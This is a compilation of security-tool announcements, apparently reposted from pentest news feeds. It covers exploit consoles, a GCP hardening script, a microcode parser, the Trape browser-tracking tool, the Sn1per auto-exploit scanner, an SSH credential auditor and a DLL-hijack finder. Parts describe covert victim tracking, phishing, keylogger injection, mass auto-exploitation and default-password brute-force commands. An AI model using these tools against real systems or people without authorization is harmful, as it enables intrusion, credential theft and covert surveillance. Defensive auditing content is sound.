MEC v1.4.0 – Mass Exploit Console

massExploitConsole: a collection of hacking tools with a CLI UI.

Disclaimer

Please use this tool only on authorized systems; I'm not responsible for any damage caused by users who ignore my warning. Exploits are adapted from other sources, please refer to their author info. Please note that, due to my limited programming experience (it's my first Python project), you can expect some silly bugs.

Features

- An easy-to-use CLI UI
- Execute any adapted exploits with process-level concurrency
- Some built-in exploits (automated)
- Hide your IP address using proxychains4 and ss-proxy (built-in)
- ZoomEye host scan (10 threads)
- A simple Baidu crawler (multi-threaded)
- Censys host scan

Getting started

git clone https://github.com/jm33-m0/massExpConsole.git && cd massExpConsole && ./install.py

When installing PyPI deps, apt-get install libncurses5-dev (for Debian-based distros) might be needed. Now you should be good to go (if not, please report missing deps here). Type the proxy command to run a pre-configured Shadowsocks SOCKS5 proxy in the background; vim ./data/ss.json to edit the proxy config. ss-proxy exits together with mec.py.

Requirements

- GNU/Linux, WSL, macOS (not tested); fully tested under Arch Linux, Kali Linux (Rolling, 2018), Ubuntu Linux (16.04 LTS) and Fedora 25 (it will work on other distros too as long as you have dealt with all deps)
- Python 3.5 or later (or something might go wrong, see https://github.com/jm33-m0/massExpConsole/issues/7#issuecomment-305962655)
- proxychains4 (in $PATH), used by the exploiter; it requires a working SOCKS5 proxy (you can modify its config in mec.py)
- Java is required when using Java deserialization exploits; you might want to install openjdk-8-jre if you haven't installed it yet
- Note that you have to install all the deps of your exploits or tools as well

Usage

Just run mec.py; if it complains about missing modules, install them.

If you want to add your own exploit script (or binary file, whatever):

- cd exploits, then mkdir a directory for it; your exploit should take the last argument passed to it as its target, dig into mec.py to know more
- chmod +x <exploit> to make sure it can be executed by the current user
- Use the attack command, then m, to select your custom exploit

Type help in the console to see all available features. ZoomEye requires a valid user account config file zoomeye.conf.

Link: http://www.kitploit.com/2018/12/mec-v140-mass-exploit-console.html

Hayat – Auditing & Hardening Script For Google Cloud Platform

Hayat is an auditing & hardening script for Google Cloud Platform services. For now it covers:

- Identity & Access Management
- Networking
- Virtual Machines
- Storage
- Cloud SQL Instances
- Kubernetes Clusters

Identity & Access Management

- Ensure that corporate login credentials are used instead of Gmail accounts.
- Ensure that there are only GCP-managed service account keys for each service account.
- Ensure that no ServiceAccount has Admin privileges.
- Ensure that IAM users are not assigned the Service Account User role at project level.

Networking

- Ensure the default network does not exist in a project.
- Ensure legacy networks do not exist for a project.
- Ensure that DNSSEC is enabled for Cloud DNS.
- Ensure that RSASHA1 is not used for the key-signing key in Cloud DNS DNSSEC.
- Ensure that RSASHA1 is not used for the zone-signing key in Cloud DNS DNSSEC.
- Ensure that RDP access is restricted from the Internet.
- Ensure Private Google Access is enabled for every subnetwork in the VPC Network.
- Ensure VPC Flow Logs are enabled for every subnet in the VPC Network.

Virtual Machines

- Ensure that instances are not configured to use the default service account with full access to all Cloud APIs.
- Ensure "Block Project-wide SSH keys" is enabled for VM instances.
- Ensure OS Login is enabled for a project.
- Ensure "Enable connecting to serial ports" is not enabled for VM instances.
- Ensure that IP forwarding is not enabled on instances.

Storage

- Ensure that Cloud Storage buckets are not anonymously or publicly accessible.
- Ensure that logging is enabled for Cloud Storage buckets.

Cloud SQL Database Services

- Ensure that Cloud SQL database instances require all incoming connections to use SSL.
- Ensure that Cloud SQL database instances are not open to the world.
- Ensure that MySQL database instances do not allow anyone to connect with administrative privileges.
- Ensure that MySQL database instances do not allow root login from any host.

Kubernetes Engine

- Ensure Stackdriver Logging is set to Enabled on Kubernetes Engine clusters.
- Ensure Stackdriver Monitoring is set to Enabled on Kubernetes Engine clusters.
- Ensure Legacy Authorization is set to Disabled on Kubernetes Engine clusters.
- Ensure Master authorized networks is set to Enabled on Kubernetes Engine clusters.
- Ensure Kubernetes clusters are configured with labels.
- Ensure the Kubernetes web UI / Dashboard is disabled.
- Ensure automatic node repair is enabled for Kubernetes clusters.
- Ensure automatic node upgrades are enabled on Kubernetes Engine cluster nodes.

Requirements

Hayat has been written as a bash script using gcloud and is compatible with Linux and OSX.

Usage

git clone https://github.com/DenizParlak/Hayat.git && cd Hayat && chmod +x hayat.sh && ./hayat.sh

You can run specific functions only, e.g. if you want to scan just the Kubernetes cluster:

./hayat.sh --only-kubernetes
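As an added example of what one of the Networking checks above ("Ensure that RDP access is restricted from the Internet") has to evaluate, here is a small Python checker (not Hayat's own code, which is bash around gcloud) that reads the JSON that `gcloud compute firewall-rules list --format=json` prints and flags enabled ingress rules allowing tcp/3389 from 0.0.0.0/0; the embedded rules are constructed sample data, not output from a real project.

```python
"""Flag GCP firewall rules that expose RDP (tcp/3389) to the Internet.

Added example, not part of Hayat. It evaluates the JSON document that
`gcloud compute firewall-rules list --format=json` returns. The rules
in SAMPLE_RULES are constructed sample data, not a real project's output.
"""
import json

RDP_PORT = 3389
ANY_IPV4 = "0.0.0.0/0"


def _port_in_spec(port, spec):
    """True if port falls inside a gcloud port spec such as "3389" or "3300-3400"."""
    lo, _, hi = spec.partition("-")
    return int(lo) <= port <= int(hi or lo)


def rule_exposes_port(rule, port):
    """Return True if an enabled INGRESS rule allows tcp/<port> from 0.0.0.0/0."""
    if rule.get("disabled") or rule.get("direction", "INGRESS") != "INGRESS":
        return False
    if ANY_IPV4 not in rule.get("sourceRanges", []):
        return False
    for allowed in rule.get("allowed", []):
        proto = allowed.get("IPProtocol", "").lower()
        if proto not in ("tcp", "all"):
            continue
        ports = allowed.get("ports")  # a missing "ports" key means every port
        if not ports or any(_port_in_spec(port, p) for p in ports):
            return True
    return False


def find_open_rdp_rules(rules_json):
    """Names of the rules that leave RDP open to the world (the Hayat-style check)."""
    return sorted(r["name"] for r in json.loads(rules_json)
                  if rule_exposes_port(r, RDP_PORT))


# Constructed sample in the shape gcloud emits, trimmed to the relevant fields.
SAMPLE_RULES = json.dumps([
    {"name": "allow-rdp-anywhere", "direction": "INGRESS", "disabled": False,
     "sourceRanges": ["0.0.0.0/0"],
     "allowed": [{"IPProtocol": "tcp", "ports": ["3389"]}]},
    {"name": "allow-rdp-from-office", "direction": "INGRESS", "disabled": False,
     "sourceRanges": ["203.0.113.0/24"],
     "allowed": [{"IPProtocol": "tcp", "ports": ["3389"]}]},
    {"name": "allow-range-anywhere", "direction": "INGRESS", "disabled": False,
     "sourceRanges": ["0.0.0.0/0"],
     "allowed": [{"IPProtocol": "tcp", "ports": ["3000-4000"]}]},
    {"name": "allow-all-disabled", "direction": "INGRESS", "disabled": True,
     "sourceRanges": ["0.0.0.0/0"],
     "allowed": [{"IPProtocol": "all"}]},
    {"name": "allow-ssh-anywhere", "direction": "INGRESS", "disabled": False,
     "sourceRanges": ["0.0.0.0/0"],
     "allowed": [{"IPProtocol": "tcp", "ports": ["22"]}]},
])

if __name__ == "__main__":
    # Replace SAMPLE_RULES with sys.stdin.read() to pipe real gcloud output in.
    for name in find_open_rdp_rules(SAMPLE_RULES):
        print("RDP open to the Internet:", name)
```

The port-range rule is flagged as well as the explicit 3389 rule, while the disabled rule and the rule restricted to a single office range are not.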

Link: http://feedproxy.google.com/~r/PentestTools/~3/eanL2lSrxVg/hayat-auditing-hardening-script-for.html

MCExtractor – Intel, AMD, VIA & Freescale Microcode Extraction Tool

Intel, AMD, VIA & Freescale Microcode Extraction Tool

Links: MC Extractor News Feed, MC Extractor Discussion Topic, Intel, AMD & VIA CPU Microcode Repositories

A. About MC Extractor

MC Extractor is a tool which parses Intel, AMD, VIA and Freescale processor microcode binaries. It can be used by end-users who are looking for all relevant microcode information such as CPUID, Platform, Version, Date, Release, Size, Checksum etc. It is capable of converting Intel microcode containers (dat, inc, h, txt) to binary images for BIOS integration, detecting new/unknown microcodes, checking microcode health, Updated/Outdated status and more. MC Extractor can also be used as a research analysis tool with multiple structures which allow, among others, full parsing & information display of all microcode headers, documented or not. Moreover, with the help of its extensive database, MC Extractor is capable of uniquely categorizing all supported microcodes as well as checking for any microcodes which have not been stored at the Microcode Repositories yet.

A1. MC Extractor Features

- Supports all current & legacy microcodes from 1995 onward
- Scans for all Intel, AMD, VIA & Freescale microcodes in one run
- Verifies the integrity of all extracted microcodes via checksums
- Checks if all Intel, AMD & VIA microcodes are Latest or Outdated
- Converts Intel containers (dat, inc, txt, h) to binary images
- Searches on demand for all microcodes based on CPUID
- Shows microcode header structures and details on demand
- Ignores most false positives based on sanity checks
- Supports known special, fixed or modded microcodes
- Ability to quickly add new microcode entries to the database
- Ability to detect the Intel Production/Pre-Production release tag
- Ability to analyze multiple files by drag & drop or by input path
- Ability to ignore extracted duplicates based on name and contents
- Reports all microcodes which are not found at the Microcode Repositories
- Features command line parameters to enhance functionality & assist research
- Features user-friendly messages & proper handling of unexpected code errors
- Shows results in nice tables with colored text to signify emphasis
- Open Source project licensed under GNU GPL v3, comment-assisted code

A2. Microcode Repository Database

MC Extractor allows end-users and/or researchers to quickly extract, view, convert & report new microcode versions without the use of special tools or hex editors. To do that effectively, a database had to be built. The Intel, AMD & VIA CPU Microcode Repositories is a collection of every Intel, AMD & VIA CPU microcode we have found. Its existence is very important for MC Extractor as it allows us to continue doing research, find new types of microcode, compare releases for similarities, check for updated binaries etc. Bundled with MC Extractor is a file called MCE.db which is required for the program to run. It includes entries for all microcode binaries that are available to us. This accommodates primarily two actions: a) check whether the imported microcode is up to date and b) help find new microcode releases sooner by reporting them at the Intel, AMD & VIA CPU Microcode Repositories discussion thread.

A3. Sources and Inspiration

MC Extractor was initially based on a fraction of Lordkag's UEFIStrip tool so, first and foremost, I thank him for all his work which inspired this project. Among others, great places to learn about microcodes are Intel's own download site and official documentation, Intel Microcode Patch Authentication, Coreboot (a, b, c), Microparse by Dominic Chen, Ben Hawkes's Notes and Research, Richard A Burton's Microdecode, AIDA64 CPUID dumps, Sandpile CPUID, Free Electrons (a, b), Freescale and many more which I may have forgotten but would have been here otherwise.

B. How to use MC Extractor

There are two ways to use MC Extractor: the MCE executable & the Command Prompt. The MCE executable allows you to drag & drop one or more firmware files and view them one by one or recursively scan entire directories. To manually call MC Extractor, a Command Prompt can be used with -skip as parameter.

B1. MC Extractor Executable

To use MC Extractor, select one or multiple files and drag & drop them onto its executable. You can also input certain optional parameters either by running MCE directly or by first dropping one or more files onto it. Keep in mind that, due to operating system limitations, there is a limit on how many files can be dropped at once. If the latter is a problem, you can always use the -mass parameter to recursively scan entire directories as explained below.

B2. MC Extractor Parameters

There are various parameters which enhance or modify the default behavior of MC Extractor:

- -? : Displays help & usage screen
- -skip : Skips welcome & options screen
- -exit : Skips "Press enter to exit" prompt
- -redir : Enables console redirection support
- -mass : Scans all files of a given directory
- -info : Displays microcode header(s)
- -add : Adds new input microcode to DB
- -dbname : Renames input file based on DB name
- -cont : Extracts Intel containers (dat, inc, h, txt)
- -search : Searches for microcodes based on CPUID
- -last : Shows Latest status based on user input
- -repo : Builds microcode repositories from input

B3. MC Extractor Error Control

During operation, MC Extractor may encounter issues that can trigger Notes, Warnings and/or Errors. Notes (yellow/green color) provide useful information about a characteristic of this particular firmware. Warnings (purple color) notify the user of possible problems that can cause system instability. Errors (red color) are shown when something unexpected or problematic is encountered.

C. Download MC Extractor

MC Extractor consists of two files, the executable (MCE.exe or MCE) and the database (MCE.db). An already built/frozen/compiled binary is provided by me for Windows only (icon designed by Alfredo Hernandez). Thus, you don't need to manually build/freeze/compile MC Extractor under Windows. Instead, download the latest version from the Releases tab; the title should be "MC Extractor v1.X.X". You may need to scroll down a bit if there are DB releases at the top. The latter can be used to update the outdated DB which was bundled with the latest executable release; the title should be "DB rXX". To extract the already built/frozen/compiled archive, you need to use programs which support RAR5 compression.

C1. Compatibility

MC Extractor should work on all Windows, Linux or macOS operating systems which have Python 3.6 support. Windows users who plan to use the already built/frozen/compiled binaries must make sure that they have the latest Windows Updates installed, which include all required "Universal C Runtime (CRT)" libraries.

C2. Code Prerequisites

To run MC Extractor's Python script, you need to have the following 3rd party Python modules installed:

- Colorama: pip3 install colorama
- PTable: pip3 install https://github.com/platomav/PTable/archive/boxchar.zip

C3. Build/Freeze/Compile with PyInstaller

PyInstaller can build/freeze/compile MC Extractor on all three supported platforms; it is simple to run and gets updated often.

- Make sure Python 3.6.0 or newer is installed: python --version
- Use pip to install PyInstaller: pip3 install pyinstaller
- Use pip to install colorama: pip3 install colorama
- Use pip to install PTable: pip3 install https://github.com/platomav/PTable/archive/boxchar.zip
- Build/Freeze/Compile MC Extractor: pyinstaller --noupx --onefile MCE.py
- In the dist folder you should find the final MCE executable

D. Pictures

Note: Some pictures are outdated and depict older MC Extractor versions.
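To show concretely what "parsing the header" and "verifying integrity via checksums" mean for an Intel microcode update, here is an added Python example (not MC Extractor's own code): it decodes the 48-byte Intel header layout from the Intel SDM (header version, update revision, BCD date, processor signature/CPUID, checksum, loader revision, platform flags, data size, total size) and checks that every dword of the update sums to zero mod 2^32. The CPUID, platform, revision and date values in build_sample_microcode() are constructed dummies, and the 16 data bytes stand in for a real update's payload.

```python
"""Parse and checksum-verify an Intel microcode update header.

Added example, not part of MC Extractor. Layout per the Intel SDM
(Vol. 3, Microcode Update Format): 48-byte header of little-endian dwords
followed by the update data. The sum of all dwords of the whole update
(header, data and any extended area) must be 0 mod 2**32.
"""
import struct

HEADER_FMT = "<IIIIIIIII12s"
HEADER_SIZE = struct.calcsize(HEADER_FMT)  # 48 bytes


def _bcd(value):
    """Decode a BCD-packed integer such as 0x2018 -> 2018."""
    return int("%x" % value)


def dword_sum(blob):
    """Sum all little-endian dwords of blob modulo 2**32."""
    if len(blob) % 4:
        raise ValueError("microcode length must be a multiple of 4")
    return sum(struct.unpack("<%dI" % (len(blob) // 4), blob)) & 0xFFFFFFFF


def parse_intel_microcode(blob):
    """Return the header fields and whether the whole update checksums to zero."""
    if len(blob) < HEADER_SIZE:
        raise ValueError("blob too short for an Intel microcode header")
    (hdr_ver, revision, date, cpuid, checksum, loader_rev, platform,
     data_size, total_size, _reserved) = struct.unpack_from(HEADER_FMT, blob)
    if hdr_ver != 1:
        raise ValueError("unsupported header version %d" % hdr_ver)
    # Zero sizes mean the legacy fixed layout: 2000 data bytes, 2048 total.
    data_size = data_size or 2000
    total_size = total_size or 2048
    if total_size > len(blob):
        raise ValueError("header claims %d bytes, only %d present"
                         % (total_size, len(blob)))
    # Date is BCD packed as mmddyyyy in one dword (e.g. 0x05282018).
    year, month, day = date & 0xFFFF, date >> 24, (date >> 16) & 0xFF
    return {
        "cpuid": "%08X" % cpuid,
        "platform": "%02X" % platform,  # bitmask of supported platform IDs
        "revision": "%08X" % revision,
        "date": "%04d-%02d-%02d" % (_bcd(year), _bcd(month), _bcd(day)),
        "loader_revision": loader_rev,
        "checksum": "%08X" % checksum,
        "data_size": data_size,
        "total_size": total_size,
        "checksum_ok": dword_sum(blob[:total_size]) == 0,
    }


def build_sample_microcode(cpuid=0x000906EA, platform=0x22,
                           revision=0x00000084, date=0x05282018, data=None):
    """Constructed sample (not a real Intel update): header + 16 data bytes
    with a checksum field chosen so the whole blob sums to zero."""
    data = data if data is not None else b"\x11\x22\x33\x44" * 4
    total_size = HEADER_SIZE + len(data)
    fields = [1, revision, date, cpuid, 0, 1, platform, len(data), total_size, b"\0" * 12]
    # Pack with checksum = 0, then set it to the two's complement of the sum.
    fields[4] = (-dword_sum(struct.pack(HEADER_FMT, *fields) + data)) & 0xFFFFFFFF
    return struct.pack(HEADER_FMT, *fields) + data


if __name__ == "__main__":
    sample = build_sample_microcode()
    print(parse_intel_microcode(sample))
    tampered = bytearray(sample)
    tampered[60] ^= 0x01  # flip one bit in the data area
    print("tampered checksum_ok:", parse_intel_microcode(bytes(tampered))["checksum_ok"])
```

Flipping a single bit anywhere inside total_size makes checksum_ok False, which is the same integrity signal MC Extractor reports for extracted microcodes.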

Link: http://feedproxy.google.com/~r/PentestTools/~3/UdW1gu5O6Ds/mcextractor-intel-amd-via-freescale.html

Trape v2.0 – People Tracker On The Internet: OSINT Analysis And Research Tool

Trape is an OSINT analysis and research tool which allows people to track and execute intelligent social engineering attacks in real time. It was created with the aim of teaching the world how large Internet companies could obtain confidential information, such as the status of sessions on their websites or services, and gain control over their users through the browser without them knowing. It has since evolved with the aim of helping government organizations, companies and researchers to track cybercriminals.

At the beginning of 2018 it was presented at BlackHat Arsenal in Singapore (https://www.blackhat.com/asia-18/arsenal.html#jose-pino) and at multiple security events worldwide.

Some benefits

- LOCATOR OPTIMIZATION: Trace the path between you and the target you're tracking. Each time you make a move, the path is updated; the location of the target is obtained silently through a bypass made in the browsers, so the location request permission on the victim's side is not triggered, while maintaining a precision of 99% in the locator.
- APPROACH: When you're close to the target, Trape will tell you.
- REST API: Generates an API (random or custom), through which you can control and monitor other web sites on the Internet remotely, getting the traffic of all visitors.
- PROCESS HOOKS: Manages social engineering attacks or processes in the target's browser.
  - SEVERAL: You can issue a phishing attack of any domain or service in real time as well as send malicious files to compromise the device of a target.
  - INJECT JS: You keep JavaScript code running freely in real time, so you can manage the execution of a keylogger or your own custom JS functions, which will be reflected in the target's browser.
  - SPEECH: An audio creation process is maintained which is played in the target's browser; by means of this you can execute personalized messages in different voices, in Spanish and English.
- PUBLIC NETWORK TUNNEL: Trape has its own API that is linked to ngrok.com to allow the automatic management of public network tunnels; with this you can publish the content of a trape server executed locally to the Internet, to manage hooks or public attacks.
- CLICK ATTACK TO GET CREDENTIALS: Automatically obtains the target's credentials, recognizing their connection availability on a social network or Internet service.
- NETWORK: You can get information about the user's network.
  - SPEED: Viewing the target's network speed (ping, download, upload, connection type).
  - HOSTS OR DEVICES: Here you can get a scan of all the devices connected to the target's network automatically.
- PROFILE: Brief summary of the target's behavior and important additional information about their device.
  - GPU
  - ENERGY
- 30-session recognition: Session recognition is one of trape's most interesting attractions, since you as a researcher can know remotely what service the target is connected to.
- USABILITY: You can delete logs and view alerts for each process or action you run against each target.

How to use it

First download the tool.

git clone https://github.com/jofpin/trape.git
cd trape
python trape.py -h

If it does not work, try to install all the libraries that are listed in the file requirements.txt:

pip install -r requirements.txt

Example of execution

Example: python trape.py --url http://example.com --port 8080

HELP AND OPTIONS

user:~$ python trape.py --help
usage: python trape.py -u <> -p <> [-h] [-v] [-u URL] [-p PORT] [-ak ACCESSKEY] [-l LOCAL] [--update] [-n] [-ic INJC]

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -u URL, --url URL     Put the web page url to clone
  -p PORT, --port PORT  Insert your port
  -ak ACCESSKEY, --accesskey ACCESSKEY
                        Insert your custom key access
  -l LOCAL, --local LOCAL
                        Insert your home file
  -n, --ngrok           Insert your ngrok Authtoken
  -ic INJC, --injectcode INJC
                        Insert your custom REST API path
  -ud UPDATE, --update UPDATE
                        Update trape to the latest version

- --url: In this option you add the URL you use to clone live, which works as a decoy.
- --port: Here you insert the port where you are going to run the trape server.
- --accesskey: You enter a custom key for the trape panel; if you do not insert one, an automatic key is generated.
- --injectcode: trape contains a REST API to play anywhere; using this option you can customize the name of the file to include. If you do not, a random token-like name is generated.
- --local: Using this option you can call a local HTML file; this is the replacement of the --url option, made to run a local lure in trape.
- --ngrok: In this option you can enter a token to run at the time of a process. This would replace the token saved in the configuration.
- --version: You can see the version number of trape.
- --update: Option especially to upgrade to the latest version of trape.
- --help: It is used to see all the above options from the executable.

Disclaimer

This tool has been published for educational purposes, in order to teach people how bad guys could track them, monitor them or obtain information from their credentials; we are not responsible for the use or the scope that people may give this project. We are totally convinced that if we teach how vulnerable things are, we can make the Internet a safer place.

Developer

In this project and others, participants are credited with name, Twitter handle and role.

CREATOR: Jose Pino – @jofpin – (Security Researcher)

Link: http://www.kitploit.com/2018/11/trape-v20-people-tracker-on-internet.html

Sn1per v6.0 – Automated Pentest Framework For Offensive Security Experts

Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for professional penetration testers, bug bounty researchers and corporate security teams to manage large environments and pentest scopes.

SN1PER PROFESSIONAL FEATURES:

- Professional reporting interface
- Slideshow for all gathered screenshots
- Searchable and sortable DNS, IP and open port database
- Categorized host reports
- Quick links to online recon tools and Google hacking queries
- Personalized notes field for each host

DEMO VIDEO:

SN1PER COMMUNITY FEATURES:

- Automatically collects basic recon (i.e. whois, ping, DNS, etc.)
- Automatically launches Google hacking queries against a target domain
- Automatically enumerates open ports via Nmap port scanning
- Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers
- Automatically checks for sub-domain hijacking
- Automatically runs targeted Nmap scripts against open ports
- Automatically runs targeted Metasploit scan and exploit modules
- Automatically scans all web applications for common vulnerabilities
- Automatically brute forces ALL open services
- Automatically tests for anonymous FTP access
- Automatically runs WPScan, Arachni and Nikto for all web services
- Automatically enumerates NFS shares
- Automatically tests for anonymous LDAP access
- Automatically enumerates SSL/TLS ciphers, protocols and vulnerabilities
- Automatically enumerates SNMP community strings, services and users
- Automatically lists SMB users and shares, checks for NULL sessions and exploits MS08-067
- Automatically exploits vulnerable JBoss, Java RMI and Tomcat servers
- Automatically tests for open X11 servers
- Auto-pwn added for Metasploitable, ShellShock, MS08-067, default Tomcat creds
- Performs high level enumeration of multiple hosts and subnets
- Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting
- Automatically gathers screenshots of all web sites
- Create individual workspaces to store all scan output

AUTO-PWN:

- Drupal Drupalgeddon2 RCE CVE-2018-7600
- GPON Router RCE CVE-2018-10561
- Apache Struts 2 RCE CVE-2017-5638
- Apache Struts 2 RCE CVE-2017-9805
- Apache Jakarta RCE CVE-2017-5638
- Shellshock GNU Bash RCE CVE-2014-6271
- HeartBleed OpenSSL Detection CVE-2014-0160
- Default Apache Tomcat Creds CVE-2009-3843
- MS Windows SMB RCE MS08-067
- Webmin File Disclosure CVE-2006-3392
- Anonymous FTP Access
- PHPMyAdmin Backdoor RCE
- PHPMyAdmin Auth Bypass
- JBoss Java De-Serialization RCEs

KALI LINUX INSTALL:

./install.sh

DOCKER INSTALL:

Credits: @menzow
Docker Install: https://github.com/menzow/sn1per-docker
Docker Build: https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/

Example usage:

$ docker pull menzo/sn1per-docker
$ docker run --rm -ti menzo/sn1per-docker sniper menzo.io

USAGE:

[*] NORMAL MODE
sniper -t|--target <TARGET>

[*] NORMAL MODE + OSINT + RECON
sniper -t|--target <TARGET> -o|--osint -re|--recon

[*] STEALTH MODE + OSINT + RECON
sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon

[*] DISCOVER MODE
sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORKSPACE_ALIAS>

[*] SCAN ONLY SPECIFIC PORT
sniper -t|--target <TARGET> -m port -p|--port <portnum>

[*] FULLPORTONLY SCAN MODE
sniper -t|--target <TARGET> -fp|--fullportonly

[*] PORT SCAN MODE
sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>

[*] WEB MODE – PORT 80 + 443 ONLY!
sniper -t|--target <TARGET> -m|--mode web

[*] HTTP WEB PORT MODE
sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>

[*] HTTPS WEB PORT MODE
sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>

[*] ENABLE BRUTEFORCE
sniper -t|--target <TARGET> -b|--bruteforce

[*] AIRSTRIKE MODE
sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike

[*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED
sniper -f|--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>

[*] ENABLE LOOT IMPORTING INTO METASPLOIT
sniper -t|--target <TARGET>

[*] LOOT REIMPORT FUNCTION
sniper -w <WORKSPACE_ALIAS> --reimport

[*] UPDATE SNIPER
sniper -u|--update

MODES:

- NORMAL: Performs a basic scan of targets and open ports using both active and passive checks for optimal performance.
- STEALTH: Quickly enumerates single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.
- AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts/IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
- NUKE: Launches a full audit of multiple hosts specified in a text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.
- DISCOVER: Parses all hosts on a subnet/CIDR (i.e. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
- PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
- FULLPORTONLY: Performs a full detailed port scan and saves results to XML.
- WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.
- WEBPORTHTTP: Launches a full HTTP web application scan against a specific host and port.
- WEBPORTHTTPS: Launches a full HTTPS web application scan against a specific host and port.
- UPDATE: Checks for updates and upgrades all components used by sniper.
- REIMPORT: Reimports all workspace files into Metasploit and reproduces all reports.
- RELOAD: Reloads the master workspace report.

SAMPLE REPORT:

https://gist.github.com/1N3/8214ec2da2c91691bcbc

Link: http://feedproxy.google.com/~r/PentestTools/~3/RLWB_3_Wk9M/sn1per-v60-automated-pentest-framework.html

CMS Scanner – Scan WordPress, Drupal, Joomla, vBulletin Websites For Security Issues

Scan WordPress, Drupal, Joomla and vBulletin websites for security issues.

CMSScan provides a centralized security dashboard for CMS security scans. It is powered by wpscan, droopescan, vbscan and joomscan. It supports both on-demand and scheduled scans and has the ability to send email reports.

Install

# Requires ruby, ruby-dev, gem, python3 and git
git clone https://github.com/ajinabraham/CMSScan.git
cd CMSScan
./setup.sh

Run

./run.sh

Periodic Scans

You can perform periodic CMS scans with CMSScan. You must run the CMSScan server separately and configure the following before running the scheduler.py script.

# SMTP SETTINGS
SMTP_SERVER = ''
FROM_EMAIL = ''
TO_EMAIL = ''
# SERVER SETTINGS
SERVER = ''
# SCAN SITES
WORDPRESS_SITES = []
DRUPAL_SITES = []
JOOMLA_SITES = []
VBULLETIN_SITES = []

Add a cronjob

crontab -e
@weekly /usr/bin/python3 scheduler.py

Docker

Local

docker build -t cmsscan .
docker run -it -p 7070:7070 cmsscan

Prebuilt Image

docker pull opensecurity/cmsscan
docker run -it -p 7070:7070 opensecurity/cmsscan

Link: http://feedproxy.google.com/~r/PentestTools/~3/w0AREgkhNJQ/cms-scanner-scan-wordpress-drupal.html

SSH Auditor – The Best Way To Scan For Weak Ssh Passwords On Your Network

Features

ssh-auditor will automatically:

- Re-check all known hosts as new credentials are added. It will only check the new credentials.
- Queue a full credential scan on any new host discovered.
- Queue a full credential scan on any known host whose SSH version or key fingerprint changes.
- Attempt command execution as well as attempt to tunnel a TCP connection.
- Re-check each credential using a per-credential scan_interval (default 14 days).

It's designed so that you can run ssh-auditor discover + ssh-auditor scan from cron every hour to perform a constant audit.

Demos

- Earlier demo showing all of the features
- Demo showing improved log output

Usage

Install

$ brew install go # or however you want to install the go compiler
$ go get github.com/ncsa/ssh-auditor

or build from a git clone

$ go build

Build a static binary including sqlite

$ make static

Ensure you can use enough file descriptors

$ ulimit -n 4096

Create the initial database and discover ssh servers

$ ./ssh-auditor discover -p 22 -p 2222 192.168.1.0/24 10.0.0.1/24

Add credential pairs to check

$ ./ssh-auditor addcredential root root
$ ./ssh-auditor addcredential admin admin
$ ./ssh-auditor addcredential guest guest --scan-interval 1 # check this once per day

Try credentials against discovered hosts in a batch of 20000

$ ./ssh-auditor scan

Output a report on what credentials worked

$ ./ssh-auditor vuln

Re-check credentials that worked

$ ./ssh-auditor rescan

Output a report on duplicate key usage

$ ./ssh-auditor dupes

Report query

The query that ssh-auditor vuln runs is:

select hc.hostport, hc.user, hc.password, hc.result, hc.last_tested, h.version from host_creds hc, hosts h where h.hostport = hc.hostport and result!='' order by last_tested asc

Link: http://feedproxy.google.com/~r/PentestTools/~3/EzIGBgulgtk/ssh-auditor-best-way-to-scan-for-weak.html

Robber – Robber Is Open Source Tool For Finding Executables Prone To DLL Hijacking

Robber is a free open source tool developed using Delphi XE2 without any 3rd party dependencies.

What is DLL hijacking?

Windows has a search path for DLLs in its underlying architecture. If you can figure out what DLLs an executable requests without an absolute path (triggering this search process), you can then place your hostile DLL somewhere higher up the search path so it'll be found before the real version is, and Windows will happily feed your attack code to the application.

So, let's pretend Windows's DLL search path looks something like this:

A) . <-- current working directory of the executable, highest priority, first checked
B) \Windows
C) \Windows\system32
D) \Windows\syswow64 <-- lowest priority, last checked

and some executable "Foo.exe" requests "bar.dll", which happens to live in the syswow64 (D) subdir. This gives you the opportunity to place your malicious version in A), B) or C) and it will be loaded into the executable.

As stated before, even an absolute full path can't protect against this if you can replace the DLL with your own version. Microsoft Windows protects system paths like System32 using the Windows File Protection mechanism, but the best way to protect an executable from DLL hijacking in enterprise solutions is:

- Use absolute paths instead of relative paths
- If you have a personal code-signing certificate, sign your DLL files and check the signature in your application before loading the DLL into memory; otherwise check the hash of the DLL file against the original DLL's hash

And of course, this isn't really limited to Windows either. Any OS which allows for dynamic linking of external libraries is theoretically vulnerable to this.

Robber uses a simple mechanism to figure out which DLLs are prone to hijacking:

- Scan the import table of the executable and find out which DLLs are linked to the executable
- Search for DLL files placed inside the executable's directory that match a linked DLL (as said before, the current working directory of the executable has the highest priority)
- If any DLL is found, scan its export table
- Compare the import table of the executable with the export table of the DLL; if any match is found, the executable and the matched common functions are flagged as a DLL hijack candidate

Features:

- Ability to select scan type (signed/unsigned applications)
- Determine executable signer
- Determine which referenced DLLs are candidates for hijacking
- Determine exported method names of candidate DLLs
- Configure rules to determine which hijacks are the best or good choices for use and show them in different colors

Find the latest Robber executable here.

Link: http://feedproxy.google.com/~r/PentestTools/~3/-3o2PCxEGpE/robber-robber-is-open-source-tool-for.html

